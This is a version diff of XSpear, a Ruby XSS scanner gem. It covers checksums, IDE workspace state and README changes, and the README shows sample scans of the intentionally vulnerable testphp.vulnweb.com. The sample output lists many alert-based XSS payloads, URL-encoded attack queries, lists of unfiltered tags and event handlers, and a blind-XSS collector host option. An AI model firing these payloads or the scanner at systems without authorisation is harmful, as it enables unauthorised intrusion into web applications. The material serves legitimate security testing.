XSpear 1.1.4 → 1.1.5

Sign up to get free protection for your applications and to get access to all the features.
checksums.yaml CHANGED
@@ -1,7 +1,7 @@
1
1
  ---
2
2
  SHA256:
3
- metadata.gz: b975c8acedef399b45b9d865d7845d76ef202d1ef19d37dd8d7314644e379537
4
- data.tar.gz: befb749d80ee758e96aec8809947d607c1a245af4bc41e0ec059ba305b812ebe
3
+ metadata.gz: cfc44f2d92f1b26e5d333eeb40c8d6ec91f18acb718a91fa034d3ca69682dbf0
4
+ data.tar.gz: ac964e34502fd47bad4e4eafa0e7ae58505a67de2f47d2ddce1e2606607570db
5
5
  SHA512:
6
- metadata.gz: e4b3d89ad70cdc1c37b095dfd0d7a5cec84057f1ffe7522ace6f8707fa6cdb53e068e7257aa7792395eea9a5e0bc225a4fa06e614a5d41fcab16c20848710884
7
- data.tar.gz: 39fe93dc3493aa40d91226d72668f21362d2f8dc55b014e43a0b55235a2add24b1ae5ce2a0789c310ec617e50bcc23253b2c5f5819a770c9c2b39387f58456d4
6
+ metadata.gz: 54837391e4c4da2517b10248cbdcb537745830ae213e8c131db450de1e5d97dd6576e15f4e76f43fd2d0f1f53f73d4b37a2c6f7521b4dff6460b9c2bb9646a74
7
+ data.tar.gz: 794f40198ac102353e135e30f1363af28b139c531bf1bc7da4286223230d38d9b9fa1e8d46b0371c42d50f592e763d5e4eceeb4fd44dc1ae68815df8492e8f29
data/.idea/workspace.xml CHANGED
@@ -3,7 +3,9 @@
3
3
  <component name="ChangeListManager">
4
4
  <list default="true" id="4ee2e581-45d7-4c90-b6a1-e92e4b5829dd" name="Default Changelist" comment="">
5
5
  <change beforePath="$PROJECT_DIR$/.idea/workspace.xml" beforeDir="false" afterPath="$PROJECT_DIR$/.idea/workspace.xml" afterDir="false" />
6
+ <change beforePath="$PROJECT_DIR$/README.md" beforeDir="false" afterPath="$PROJECT_DIR$/README.md" afterDir="false" />
6
7
  <change beforePath="$PROJECT_DIR$/lib/XSpear.rb" beforeDir="false" afterPath="$PROJECT_DIR$/lib/XSpear.rb" afterDir="false" />
8
+ <change beforePath="$PROJECT_DIR$/lib/XSpear/version.rb" beforeDir="false" afterPath="$PROJECT_DIR$/lib/XSpear/version.rb" afterDir="false" />
7
9
  </list>
8
10
  <option name="EXCLUDED_CONVERTED_TO_IGNORED" value="true" />
9
11
  <option name="SHOW_DIALOG" value="false" />
@@ -16,23 +18,23 @@
16
18
  </component>
17
19
  <component name="FileEditorManager">
18
20
  <leaf SIDE_TABS_SIZE_LIMIT_KEY="300">
19
- <file pinned="false" current-in-tab="false">
21
+ <file pinned="false" current-in-tab="true">
20
22
  <entry file="file://$PROJECT_DIR$/README.md">
21
23
  <provider selected="true" editor-type-id="split-provider[text-editor;markdown-preview-editor]">
22
24
  <state split_layout="SPLIT">
23
- <first_editor relative-caret-position="407">
24
- <caret line="243" column="42" lean-forward="true" selection-start-line="243" selection-start-column="42" selection-end-line="243" selection-end-column="42" />
25
+ <first_editor relative-caret-position="180">
26
+ <caret line="12" column="72" selection-start-line="12" selection-start-column="72" selection-end-line="12" selection-end-column="72" />
25
27
  </first_editor>
26
28
  <second_editor />
27
29
  </state>
28
30
  </provider>
29
31
  </entry>
30
32
  </file>
31
- <file pinned="false" current-in-tab="true">
33
+ <file pinned="false" current-in-tab="false">
32
34
  <entry file="file://$PROJECT_DIR$/lib/XSpear.rb">
33
35
  <provider selected="true" editor-type-id="text-editor">
34
- <state relative-caret-position="256">
35
- <caret line="508" column="107" lean-forward="true" selection-start-line="508" selection-start-column="107" selection-end-line="508" selection-end-column="107" />
36
+ <state relative-caret-position="134">
37
+ <caret line="76" column="9" lean-forward="true" selection-start-line="76" selection-start-column="9" selection-end-line="76" selection-end-column="9" />
36
38
  </state>
37
39
  </provider>
38
40
  </entry>
@@ -113,10 +115,10 @@
113
115
  <option value="$PROJECT_DIR$/XSpear.gemspec" />
114
116
  <option value="$PROJECT_DIR$/exe/XSpear" />
115
117
  <option value="$PROJECT_DIR$/lib/XSpear/banner.rb" />
116
- <option value="$PROJECT_DIR$/lib/XSpear/version.rb" />
117
118
  <option value="$PROJECT_DIR$/lib/XSpear/XSpearRepoter.rb" />
118
- <option value="$PROJECT_DIR$/README.md" />
119
+ <option value="$PROJECT_DIR$/lib/XSpear/version.rb" />
119
120
  <option value="$PROJECT_DIR$/lib/XSpear.rb" />
121
+ <option value="$PROJECT_DIR$/README.md" />
120
122
  </list>
121
123
  </option>
122
124
  </component>
@@ -233,21 +235,7 @@
233
235
  <workItem from="1563809961097" duration="4237000" />
234
236
  <workItem from="1563893538891" duration="11917000" />
235
237
  <workItem from="1564151699165" duration="2494000" />
236
- <workItem from="1564413097342" duration="6632000" />
237
- </task>
238
- <task id="LOCAL-00007" summary="edit gem dependency(runtime, developement)">
239
- <created>1563202364398</created>
240
- <option name="number" value="00007" />
241
- <option name="presentableId" value="LOCAL-00007" />
242
- <option name="project" value="LOCAL" />
243
- <updated>1563202364398</updated>
244
- </task>
245
- <task id="LOCAL-00008" summary="Edit readme">
246
- <created>1563202539755</created>
247
- <option name="number" value="00008" />
248
- <option name="presentableId" value="LOCAL-00008" />
249
- <option name="project" value="LOCAL" />
250
- <updated>1563202539755</updated>
238
+ <workItem from="1564413097342" duration="8852000" />
251
239
  </task>
252
240
  <task id="LOCAL-00009" summary="Edit readme">
253
241
  <created>1563202605282</created>
@@ -578,11 +566,34 @@
578
566
  <option name="project" value="LOCAL" />
579
567
  <updated>1565281795460</updated>
580
568
  </task>
581
- <option name="localTasksCounter" value="56" />
569
+ <task id="LOCAL-00056" summary="(1.1.4) [Fixed #19] Add http.code, message log, edit log format on verbose=3">
570
+ <created>1565283137057</created>
571
+ <option name="number" value="00056" />
572
+ <option name="presentableId" value="LOCAL-00056" />
573
+ <option name="project" value="LOCAL" />
574
+ <updated>1565283137057</updated>
575
+ </task>
576
+ <task id="LOCAL-00057" summary="(1.1.4) Released 1.1.4">
577
+ <created>1565283263992</created>
578
+ <option name="number" value="00057" />
579
+ <option name="presentableId" value="LOCAL-00057" />
580
+ <option name="project" value="LOCAL" />
581
+ <updated>1565283263992</updated>
582
+ </task>
583
+ <option name="localTasksCounter" value="58" />
582
584
  <servers />
583
585
  </component>
584
586
  <component name="TimeTrackingManager">
585
- <option name="totallyTimeSpent" value="45602000" />
587
+ <option name="totallyTimeSpent" value="47822000" />
588
+ </component>
589
+ <component name="TodoView">
590
+ <todo-panel id="selected-file">
591
+ <is-autoscroll-to-source value="true" />
592
+ </todo-panel>
593
+ <todo-panel id="all">
594
+ <are-packages-shown value="true" />
595
+ <is-autoscroll-to-source value="true" />
596
+ </todo-panel>
586
597
  </component>
587
598
  <component name="ToolWindowManager">
588
599
  <frame x="-1920" y="-643" width="1920" height="1080" extended-state="0" />
@@ -597,11 +608,11 @@
597
608
  <window_info anchor="bottom" id="Debug" order="3" weight="0.4" />
598
609
  <window_info anchor="bottom" id="Cvs" order="4" weight="0.25" />
599
610
  <window_info anchor="bottom" id="Inspection" order="5" weight="0.4" />
600
- <window_info anchor="bottom" id="TODO" order="6" />
611
+ <window_info anchor="bottom" id="TODO" order="6" weight="0.32970297" />
601
612
  <window_info anchor="bottom" id="Docker" order="7" show_stripe_button="false" />
602
613
  <window_info anchor="bottom" id="Database Changes" order="8" />
603
614
  <window_info anchor="bottom" id="Version Control" order="9" />
604
- <window_info active="true" anchor="bottom" id="Terminal" order="10" visible="true" weight="0.32277226" />
615
+ <window_info active="true" anchor="bottom" id="Terminal" order="10" visible="true" weight="0.34059405" />
605
616
  <window_info anchor="bottom" id="Event Log" order="11" side_tool="true" />
606
617
  <window_info anchor="bottom" id="Messages" order="12" weight="0.32953367" />
607
618
  <window_info anchor="right" id="Commander" internal_type="SLIDING" order="0" type="SLIDING" weight="0.4" />
@@ -614,8 +625,6 @@
614
625
  <option name="version" value="1" />
615
626
  </component>
616
627
  <component name="VcsManagerConfiguration">
617
- <MESSAGE value="(1.0.6)[fixed #6] Edit Static Analysis code" />
618
- <MESSAGE value="(1.0.6)[fixed #7] CallbackNotAdded 쪽 분기문 수정" />
619
628
  <MESSAGE value="(1.0.6)[fixed #4] Report 객체 수정" />
620
629
  <MESSAGE value="(1.0.6)[fixed #8] Added response header analysis module" />
621
630
  <MESSAGE value="(1.0.6)[fixed #9] Added method in report-cli" />
@@ -639,7 +648,9 @@
639
648
  <MESSAGE value="(1.1.2) Releases &amp; Fixed #17 (Add some event handlers..)" />
640
649
  <MESSAGE value="(1.1.3) Releases &amp; Fixed #18 (Add onload* event handler)" />
641
650
  <MESSAGE value="(1.1.4) [Fixed #20 #22] Modified JSON Format&amp;Remove Color in XSpearReporter" />
642
- <option name="LAST_COMMIT_MESSAGE" value="(1.1.4) [Fixed #20 #22] Modified JSON Format&amp;Remove Color in XSpearReporter" />
651
+ <MESSAGE value="(1.1.4) [Fixed #19] Add http.code, message log, edit log format on verbose=3" />
652
+ <MESSAGE value="(1.1.4) Released 1.1.4" />
653
+ <option name="LAST_COMMIT_MESSAGE" value="(1.1.4) Released 1.1.4" />
643
654
  </component>
644
655
  <component name="editorHistoryManager">
645
656
  <entry file="file://$USER_HOME$/.rvm/gems/ruby-2.4.6/gems/bundler-2.0.1/lib/bundler/rubygems_integration.rb">
@@ -692,23 +703,6 @@
692
703
  </state>
693
704
  </provider>
694
705
  </entry>
695
- <entry file="file://$PROJECT_DIR$/lib/XSpear/version.rb">
696
- <provider selected="true" editor-type-id="text-editor">
697
- <state relative-caret-position="15">
698
- <caret line="1" column="18" selection-start-line="1" selection-start-column="18" selection-end-line="1" selection-end-column="18" />
699
- </state>
700
- </provider>
701
- </entry>
702
- <entry file="file://$PROJECT_DIR$/README.md">
703
- <provider selected="true" editor-type-id="split-provider[text-editor;markdown-preview-editor]">
704
- <state split_layout="SPLIT">
705
- <first_editor relative-caret-position="407">
706
- <caret line="243" column="42" lean-forward="true" selection-start-line="243" selection-start-column="42" selection-end-line="243" selection-end-column="42" />
707
- </first_editor>
708
- <second_editor />
709
- </state>
710
- </provider>
711
- </entry>
712
706
  <entry file="file://$PROJECT_DIR$/lib/XSpear/XSpearRepoter.rb">
713
707
  <provider selected="true" editor-type-id="text-editor">
714
708
  <state relative-caret-position="-61">
@@ -723,10 +717,27 @@
723
717
  </state>
724
718
  </provider>
725
719
  </entry>
720
+ <entry file="file://$PROJECT_DIR$/lib/XSpear/version.rb">
721
+ <provider selected="true" editor-type-id="text-editor">
722
+ <state relative-caret-position="15">
723
+ <caret line="1" column="18" selection-start-line="1" selection-start-column="18" selection-end-line="1" selection-end-column="18" />
724
+ </state>
725
+ </provider>
726
+ </entry>
726
727
  <entry file="file://$PROJECT_DIR$/lib/XSpear.rb">
727
728
  <provider selected="true" editor-type-id="text-editor">
728
- <state relative-caret-position="256">
729
- <caret line="508" column="107" lean-forward="true" selection-start-line="508" selection-start-column="107" selection-end-line="508" selection-end-column="107" />
729
+ <state relative-caret-position="134">
730
+ <caret line="76" column="9" lean-forward="true" selection-start-line="76" selection-start-column="9" selection-end-line="76" selection-end-column="9" />
731
+ </state>
732
+ </provider>
733
+ </entry>
734
+ <entry file="file://$PROJECT_DIR$/README.md">
735
+ <provider selected="true" editor-type-id="split-provider[text-editor;markdown-preview-editor]">
736
+ <state split_layout="SPLIT">
737
+ <first_editor relative-caret-position="180">
738
+ <caret line="12" column="72" selection-start-line="12" selection-start-column="72" selection-end-line="12" selection-end-column="72" />
739
+ </first_editor>
740
+ <second_editor />
730
741
  </state>
731
742
  </provider>
732
743
  </entry>
data/README.md CHANGED
@@ -10,7 +10,7 @@ XSpear is XSS Scanner on ruby gems
10
10
  - Detect `alert` `confirm` `prompt` event on headless browser (with Selenium)
11
11
  - Testing request/response for XSS protection bypass and reflected params<br>
12
12
  + Reflected Params
13
- + Filtered test `event handler` `HTML tag` `Special Char`
13
+ + Filtered test `event handler` `HTML tag` `Special Char` `Useful code`
14
14
  - Testing Blind XSS (with XSS Hunter , ezXSS, HBXSS, Etc all url base blind test...)
15
15
  - Dynamic/Static Analysis
16
16
  + Find SQL Error pattern
@@ -97,7 +97,7 @@ $ ruby a.rb -u 'https://www.hahwul.com/?q=123' --cookie='role=admin'
97
97
  $ xspear -u "http://testphp.vulnweb.com/search.php?test=query" -d "searchFor=yy"
98
98
  ```
99
99
 
100
- **json output**
100
+ **json output(with silence mode)**
101
101
  ```
102
102
  $ xspear -u "http://testphp.vulnweb.com/search.php?test=query" -d "searchFor=yy" -o json -v 1
103
103
  ```
@@ -117,9 +117,12 @@ $ xspear -u "http://testphp.vulnweb.com/search.php?test=query" -t 30
117
117
  $ xspear -u "http://testphp.vulnweb.com/search.php?test=query&cat=123&ppl=1fhhahwul" -p cat,test
118
118
  ```
119
119
 
120
- **testing blind xss**
120
+ **testing blind xss**<br>
121
+ (Should be used as much as possible because Blind XSS is everywhere)<br>
121
122
  ```
122
123
  $ xspear -u "http://testphp.vulnweb.com/search.php?test=query" -b "https://hahwul.xss.ht"
124
+
125
+ # Set your blind xss host. <-b options>
123
126
  ```
124
127
 
125
128
  etc...
@@ -139,75 +142,89 @@ __((_)(_)) /(/( /((_))(_))(()\
139
142
  |_| \ /<
140
143
  {\\\\\\\\\\\\\BYHAHWUL\\\\\\\\\\\(0):::<======================-
141
144
  / \<
142
- \> [ v1.0.7 ]
143
- [*] creating a test query.
144
- [*] test query generation is complete. [149 query]
145
- [*] starting test and analysis. [10 threads]
146
- [I] [00:37:34] reflected 'XsPeaR
147
- [-] [00:37:34] 'cat' Not reflected |XsPeaR
148
- [I] [00:37:34] [param: cat][Found SQL Error Pattern]
149
- [-] [00:37:34] 'STATIC' not reflected
150
- [I] [00:37:34] reflected "XsPeaR
151
- [-] [00:37:34] 'cat' Not reflected ;XsPeaR
152
- [I] [00:37:34] reflected `XsPeaR
153
- ...snip...
154
- [H] [00:37:44] reflected "><iframe/src=JavaScriPt:alert(45)>[param: cat][reflected XSS Code]
155
- [-] [00:37:44] 'cat' not reflected <img/src onerror=alert(45)>
156
- [-] [00:37:44] 'cat' not reflected <svg/onload=alert(45)>
157
- [-] [00:37:49] 'cat' not found alert/prompt/confirm event '"><svg/onload=alert(45)>
158
- [-] [00:37:49] 'cat' not found alert/prompt/confirm event '"><svg/onload=alert(45)>
159
- [-] [00:37:50] 'cat' not found alert/prompt/confirm event <xmp><p title="</xmp><svg/onload=alert(45)>">
160
- [-] [00:37:51] 'cat' not found alert/prompt/confirm event '"><svg/onload=alert(45)>
161
- [V] [00:37:51] found alert/prompt/confirm (45) in selenium!! <script>alert(45)</script>
162
- => [param: cat][triggered <script>alert(45)</script>]
163
- [V] [00:37:51] found alert/prompt/confirm (45) in selenium!! '"><svg/onload=alert(45)>
164
- => [param: cat][triggered <svg/onload=alert(45)>]
145
+ \> [ v1.1.5 ]
146
+ [*] analysis request..
147
+ [-] [23:50:35] [200/OK] 'zfdfasdf' not reflected rEfe6
148
+ [-] [23:50:35] [200/OK] 'cat' not reflected <script>alert(45)</script>
149
+ [I] [23:50:35] [200/OK] [param: cat][Found SQL Error Pattern]
150
+ [-] [23:50:35] [200/OK] 'zfdfasdf' not reflected <script>alert(45)</script>
151
+ [-] [23:50:35] [200/OK] 'STATIC' not reflected
152
+ [I] [23:50:35] [200/OK] reflected rEfe6[param: cat][reflected parameter]
153
+ [*] creating a test query [for reflected 2 param + blind xss ]
154
+ [*] test query generation is complete. [192 query]
155
+ [*] starting XSS Scanning. [10 threads]
156
+ ..snip..
157
+ [I] [23:50:47] [200/OK] reflected xsp<frameset>
158
+ [I] [23:50:47] [200/OK] reflected xsp<applet>
159
+ [I] [23:50:48] [200/OK] reflected document.cookie.xspear
160
+ [I] [23:50:48] [200/OK] reflected document.location.xspear
161
+ [-] [23:50:48] [200/OK] 'cat' not reflected <svg/onload=alert(45)>
162
+ [H] [23:50:50] [200/OK] reflected <keygen autofocus onfocus=alert(45)>[param: cat][reflected onfocus XSS Code]
163
+ [-] [23:50:55] [200/OK] 'cat' not found alert/prompt/confirm event <xmp><p title="</xmp><svg/onload=alert(45)>">
164
+ [V] [23:50:56] [200/OK] found alert/prompt/confirm (45) in selenium!! <script>alert(45)</script>[param: cat][triggered <script>alert(45)</script>]
165
+ [H] [23:50:56] [200/OK] found alert/prompt/confirm (45) in selenium!! <marquee onstart=alert(45)>[param: cat][triggered <marquee onstart=alert(45)>]
166
+ [H] [23:50:57] [200/OK] found alert/prompt/confirm (45) in selenium!! <details/open/ontoggle="alert(45)">[param: cat][triggered <details/open/ontoggle="alert(45)">]
167
+ [H] [23:50:58] [200/OK] found alert/prompt/confirm (45) in selenium!! <audio src onloadstart=alert(45)>[param: cat][triggered <audio src onloadstart=alert(45)>]
168
+ [-] [23:50:59] [200/OK] 'cat' not found alert/prompt/confirm event '"><svg/onload=alert(45)>
169
+ [-] [23:50:59] [200/OK] 'cat' not found alert/prompt/confirm event <svg(0x0c)onload=alert(1)>
170
+ [V] [23:51:00] [200/OK] found alert/prompt/confirm (45) in selenium!! '"><svg/onload=alert(45)>[param: cat][triggered <svg/onload=alert(45)>]
171
+ ...snip..
165
172
  [*] finish scan. the report is being generated..
166
- +----+-------+------------------+--------+-------+-------------------------------------+--------------------------------------------+
167
- | [ XSpear report ] |
168
- | http://testphp.vulnweb.com/listproducts.php?cat=z |
169
- | 2019-07-24 00:37:33 +0900 ~ 2019-07-24 00:37:51 +0900 Found 12 issues. |
170
- +----+-------+------------------+--------+-------+-------------------------------------+--------------------------------------------+
171
- | NO | TYPE | ISSUE | METHOD | PARAM | PAYLOAD | DESCRIPTION |
172
- +----+-------+------------------+--------+-------+-------------------------------------+--------------------------------------------+
173
- | 0 | INFO | DYNAMIC ANALYSIS | GET | cat | XsPeaR" | Found SQL Error Pattern |
174
- | 1 | INFO | STATIC ANALYSIS | GET | - | original query | Found Server: nginx/1.4.1 |
175
- | 2 | INFO | STATIC ANALYSIS | GET | - | original query | Not set HSTS |
176
- | 3 | INFO | STATIC ANALYSIS | GET | - | original query | Content-Type: text/html |
177
- | 4 | LOW | STATIC ANALYSIS | GET | - | original query | Not Set X-Frame-Options |
178
- | 5 | MIDUM | STATIC ANALYSIS | GET | - | original query | Not Set CSP |
179
- | 6 | INFO | REFLECTED | GET | cat | rEfe6 | reflected parameter |
180
- | 7 | INFO | FILERD RULE | GET | cat | onhwul=64 | not filtered event handler on{any} pattern |
181
- | 8 | HIGH | XSS | GET | cat | <script>alert(45)</script> | reflected XSS Code |
182
- | 9 | HIGH | XSS | GET | cat | "><iframe/src=JavaScriPt:alert(45)> | reflected XSS Code |
183
- | 10 | VULN | XSS | GET | cat | <script>alert(45)</script> | triggered <script>alert(45)</script> |
184
- | 11 | VULN | XSS | GET | cat | '"><svg/onload=alert(45)> | triggered <svg/onload=alert(45)> |
185
- +----+-------+------------------+--------+-------+-------------------------------------+--------------------------------------------+
173
+ +----+-------+------------------+--------+-------+----------------------------------------+-----------------------------------------------+
174
+ | [ XSpear report ] |
175
+ | http://testphp.vulnweb.com/listproducts.php?cat=123&zfdfasdf=124fff... (snip) |
176
+ | 2019-08-14 23:50:34 +0900 ~ 2019-08-14 23:51:07 +0900 Found 24 issues. |
177
+ +----+-------+------------------+--------+-------+----------------------------------------+-----------------------------------------------+
178
+ | NO | TYPE | ISSUE | METHOD | PARAM | PAYLOAD | DESCRIPTION |
179
+ +----+-------+------------------+--------+-------+----------------------------------------+-----------------------------------------------+
180
+ | 0 | INFO | STATIC ANALYSIS | GET | - | <original query> | Found Server: nginx/1.4.1 |
181
+ | 1 | INFO | STATIC ANALYSIS | GET | - | <original query> | Not set HSTS |
182
+ | 2 | INFO | STATIC ANALYSIS | GET | - | <original query> | Content-Type: text/html |
183
+ | 3 | LOW | STATIC ANALYSIS | GET | - | <original query> | Not Set X-Frame-Options |
184
+ | 4 | MIDUM | STATIC ANALYSIS | GET | - | <original query> | Not Set CSP |
185
+ | 5 | INFO | DYNAMIC ANALYSIS | GET | cat | XsPeaR" | Found SQL Error Pattern |
186
+ | 6 | INFO | REFLECTED | GET | cat | rEfe6 | reflected parameter |
187
+ | 7 | INFO | FILERD RULE | GET | cat | onhwul=64 | not filtered event handler on{any} pattern |
188
+ | 8 | HIGH | XSS | GET | cat | <script>alert(45)</script> | reflected XSS Code |
189
+ | 9 | HIGH | XSS | GET | cat | <marquee onstart=alert(45)> | reflected HTML5 XSS Code |
190
+ | 10 | HIGH | XSS | GET | cat | <details/open/ontoggle="alert`45`"> | reflected HTML5 XSS Code |
191
+ | 11 | HIGH | XSS | GET | cat | <select autofocus onfocus=alert(45)> | reflected onfocus XSS Code |
192
+ | 12 | HIGH | XSS | GET | cat | <input autofocus onfocus=alert(45)> | reflected onfocus XSS Code |
193
+ | 13 | HIGH | XSS | GET | cat | <textarea autofocus onfocus=alert(45)> | reflected onfocus XSS Code |
194
+ | 14 | HIGH | XSS | GET | cat | <audio src onloadstart=alert(45)> | reflected HTML5 XSS Code |
195
+ | 15 | HIGH | XSS | GET | cat | <meter onmouseover=alert(45)>0</meter> | reflected HTML5 XSS Code |
196
+ | 16 | HIGH | XSS | GET | cat | "><iframe/src=JavaScriPt:alert(45)> | reflected XSS Code |
197
+ | 17 | HIGH | XSS | GET | cat | <video/poster/onerror=alert(45)> | reflected HTML5 XSS Code |
198
+ | 18 | HIGH | XSS | GET | cat | <keygen autofocus onfocus=alert(45)> | reflected onfocus XSS Code |
199
+ | 19 | VULN | XSS | GET | cat | <script>alert(45)</script> | triggered <script>alert(45)</script> |
200
+ | 20 | HIGH | XSS | GET | cat | <marquee onstart=alert(45)> | triggered <marquee onstart=alert(45)> |
201
+ | 21 | HIGH | XSS | GET | cat | <details/open/ontoggle="alert(45)"> | triggered <details/open/ontoggle="alert(45)"> |
202
+ | 22 | HIGH | XSS | GET | cat | <audio src onloadstart=alert(45)> | triggered <audio src onloadstart=alert(45)> |
203
+ | 23 | VULN | XSS | GET | cat | '"><svg/onload=alert(45)> | triggered <svg/onload=alert(45)> |
204
+ +----+-------+------------------+--------+-------+----------------------------------------+-----------------------------------------------+
186
205
  < Available Objects >
187
206
  [cat] param
188
- + Available Special Char: ' \ ` ) [ } : . { ] $
189
- + Available Event Handler: "onActivate","onBeforeActivate","onAfterUpdate","onAbort","onAfterPrint","onBeforeCopy","onBeforeCut","onBeforePaste","onBlur","onBeforePrint","onBeforeDeactivate","onBeforeUpdate","onBeforeEditFocus","onBegin","onBeforeUnload","onBounce","onDataSetChanged","onCellChange","onClick","onDataAvailable","onChange","onContextMenu","onCopy","onControlSelect","onDataSetComplete","onCut","onDragStart","onDragEnter","onDragOver","onDblClick","onDragEnd","onDrop","onDeactivate","onDragLeave","onDrag","onDragDrop","onHashChange","onFocusOut","onFilterChange","onEnd","onFocus","onHelp","onErrorUpdate","onFocusIn","onFinish","onError","onLayoutComplete","onKeyDown","onKeyUp","onMediaError","onLoad","onMediaComplete","onInput","onKeyPress","onloadstart","onLoseCapture","onMouseOut","onMouseDown","onMouseWheel","onMove","onMouseLeave","onMessage","onMouseEnter","onMouseMove","onMouseOver","onMouseUp","onPropertyChange","onMoveStart","onProgress","onPopState","onPaste","onOnline","onMoveEnd","onPause","onOutOfSync","onOffline","onReverse","onResize","onRedo","onRowsEnter","onRepeat","onReset","onResizeEnd","onResizeStart","onReadyStateChange","onResume","onRowInserted","onStart","onScroll","onRowExit","onSelectionChange","onSeek","onStop","onRowDelete","onSelectStart","onSelect","ontouchstart","ontouchend","onTrackChange","onSyncRestored","onTimeError","onUndo","onURLFlip","onStorage","onUnload","onSubmit","ontouchmove"
190
- + Available HTML Tag: "meta","video","iframe","embed","script","audio","svg","object","img","frameset","applet","style","frame"
207
+ + Available Special Char: ` ( \ ' { ) } [ : $ ]
208
+ + Available Event Handler: "onBeforeEditFocus","onAbort","onActivate","onAfterUpdate","onBeforeCopy","onAfterPrint","onBeforeActivate","onBeforeCut","onBeforeDeactivate","onChange","onBeforePrint","onBounce","onBeforeUnload","onCellChange","onBeforePaste","onClick","onBegin","onBlur","onBeforeUpdate","onDataSetChanged","onCut","onDblClick","onCopy","onContextMenu","onDataSetComplete","onDeactivate","onDataAvailable","onControlSelect","onDrag","onDrop","onDragEnd","onEnd","onDragLeave","onDragStart","onDragOver","onDragEnter","onDragDrop","onError","onErrorUpdate","onFinish","onFilterChange","onKeyPress","onHelp","onFocus","onInput","onHashChange","onKeyDown","onFocusIn","onFocusOut","onMessage","onMouseDown","onLoad","onLayoutComplete","onMouseEnter","onLoseCapture","onloadstart","onMediaError","onKeyUp","onMediaComplete","onMouseOver","onMouseWheel","onMove","onMouseMove","onMouseOut","onOffline","onMoveStart","onMouseLeave","onMouseUp","onMoveEnd","onPropertyChange","onOnline","onPause","onPaste","onReadyStateChange","onRedo","onProgress","onPopState","onOutOfSync","onRepeat","onResume","onRowExit","onReset","onResizeEnd","onRowsEnter","onResizeStart","onReverse","onRowDelete","onRowInserted","onResize","onStop","onSeek","onSelect","onSubmit","onStorage","onStart","onScroll","onSelectionChange","onSyncRestored","onSelectStart","onUnload","ontouchstart","onbeforescriptexecute","onTimeError","onURLFlip","ontouchmove","ontouchend","onTrackChange","onUndo","onafterscriptexecute","onpointermove","onpointerleave","onpointerup","onpointerover","onpointerdown","onpointerenter","onloadstart","onloadend","onpointerout"
209
+ + Available HTML Tag: "script","img","embed","video","audio","meta","style","frame","iframe","svg","object","frameset","applet"
191
210
  + Available Useful Code: "document.cookie","document.location","window.location"
211
+
192
212
  < Raw Query >
193
- [0] http://testphp.vulnweb.com/listproducts.php?cat=z?cat=zXsPeaR%22
194
- [1] http://testphp.vulnweb.com/listproducts.php?cat=z?-
195
- [2] http://testphp.vulnweb.com/listproducts.php?cat=z?-
196
- [3] http://testphp.vulnweb.com/listproducts.php?cat=z?-
197
- [4] http://testphp.vulnweb.com/listproducts.php?cat=z?-
198
- [5] http://testphp.vulnweb.com/listproducts.php?cat=z?-
199
- [6] http://testphp.vulnweb.com/listproducts.php?cat=z?cat=zrEfe6
200
- [7] http://testphp.vulnweb.com/listproducts.php?cat=z?cat=z%5C%22%3E%3Cxspear+onhwul%3D64%3E
201
- [8] http://testphp.vulnweb.com/listproducts.php?cat=z?cat=z%22%3E%3Cscript%3Ealert%2845%29%3C%2Fscript%3E
202
- [9] http://testphp.vulnweb.com/listproducts.php?cat=z?cat=z%22%3E%3Ciframe%2Fsrc%3DJavaScriPt%3Aalert%2845%29%3E
203
- [10] http://testphp.vulnweb.com/listproducts.php?cat=z?cat=z%22%3E%3Cscript%3Ealert%2845%29%3C%2Fscript%3E
204
- [11] http://testphp.vulnweb.com/listproducts.php?cat=z?cat=z%27%22%3E%3Csvg%2Fonload%3Dalert%2845%29%3E
213
+ [0] http://testphp.vulnweb.com/listproducts.php?-
214
+ ..snip..
215
+ [19] http://testphp.vulnweb.com/listproducts.php?cat=123%22%3E%3Cscript%3Ealert(45)%3C/script%3E&zfdfasdf=124fffff
216
+ [20] http://testphp.vulnweb.com/listproducts.php?cat=123%22'%3E%3Cmarquee%20onstart=alert(45)%3E&zfdfasdf=124fffff
217
+ [21] http://testphp.vulnweb.com/listproducts.php?cat=123%22'%3E%3Cdetails/open/ontoggle=%22alert(45)%22%3E&zfdfasdf=124fffff
218
+ [22] http://testphp.vulnweb.com/listproducts.php?cat=123%22'%3E%3Caudio%20src%20onloadstart=alert(45)%3E&zfdfasdf=124fffff
219
+ [23] http://testphp.vulnweb.com/listproducts.php?cat=123'%22%3E%3Csvg/onload=alert(45)%3E&zfdfasdf=124fffff
220
+
221
+ ...snip...
205
222
  ```
206
223
 
207
224
  **to JSON**
208
225
  ```
209
- $ xspear -u "http://testphp.vulnweb.com/search.php?test=query" -d "searchFor=yy" -o json -v 1
210
- {"starttime":"2019-08-09 01:26:32 +0900","endtime":"2019-08-09 01:27:04 +0900","issue_count":25,"issue_list":[{"id":0,"type":"INFO","issue":"REFLECTED","method":"GET","param":"cat","payload":"rEfe6","description":"reflected parameter"},{"id":1,"type":"INFO","issue":"STATIC ANALYSIS","method":"GET","param":"-","payload":"<original query>","description":"Found Server: nginx/1.4.1"},{"id":2,"type":"INFO","issue":"STATIC ANALYSIS","method":"GET","param":"-","payload":"<original query>","description":"Not set HSTS"},{"id":3,"type":"INFO","issue":"STATIC ANALYSIS","method":"GET","param":"-","payload":"<original query>","description":"Content-Type: text/html"},{"id":4,"type":"LOW","issue":"STATIC ANALYSIS","method":"GET","param":"-","payload":"<original query>","description":"Not Set X-Frame-Options"},{"id":5,"type":"MIDUM","issue":"STATIC ANALYSIS","method":"GET","param":"-","payload":"<original query>","description":"Not Set CSP"},{"id":6,"type":"INFO","issue":"DYNAMIC ANALYSIS","method":"GET","param":"cat","payload":"XsPeaR\"","description":"Found SQL Error Pattern"},{"id":7,"type":"INFO","issue":"FILERD RULE","method":"GET","param":"cat","payload":"onhwul=64","description":"not filtered event handler on{any} pattern"},{"id":8,"type":"HIGH","issue":"XSS","method":"GET","param":"cat","payload":"<script>alert(45)</script>","description":"reflected XSS Code"},{"id":9,"type":"HIGH","issue":"XSS","method":"GET","param":"cat","payload":"<details/open/ontoggle=\"alert`45`\">","description":"reflected HTML5 XSS Code"},{"id":10,"type":"HIGH","issue":"XSS","method":"GET","param":"cat","payload":"<marquee onstart=alert(45)>","description":"reflected HTML5 XSS Code"},{"id":11,"type":"HIGH","issue":"XSS","method":"GET","param":"cat","payload":"<video/poster/onerror=alert(45)>","description":"reflected HTML5 XSS Code"},{"id":12,"type":"HIGH","issue":"XSS","method":"GET","param":"cat","payload":"<audio src onloadstart=alert(45)>","description":"reflected HTML5 XSS Code"},{"id":13,"type":"HIGH","issue":"XSS","method":"GET","param":"cat","payload":"\"><iframe/src=JavaScriPt:alert(45)>","description":"reflected XSS 